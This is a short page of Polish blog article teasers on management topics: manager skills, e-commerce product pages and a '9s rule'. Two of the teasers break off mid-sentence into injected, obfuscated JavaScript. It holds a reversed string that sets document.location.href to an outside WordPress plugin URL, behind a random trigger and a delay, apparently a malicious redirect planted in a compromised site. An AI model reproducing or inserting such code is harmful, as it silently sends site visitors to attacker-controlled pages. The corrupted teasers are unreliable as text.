Wiedza o zarządzaniu czy umiejętności?

Co decyduje o sukcesie menedżera? Czy bardziej jego umiejętności zarządzania, czy wiedza o pracy, którą nadzoruje? To zależy od pozycji, jaką pełni w organizacji, czyli od tego, na jakim szczeblu [...]

E-commerce karta produktu

Karta produktu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]

Reguła 9-tek

To reguła, że nie war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]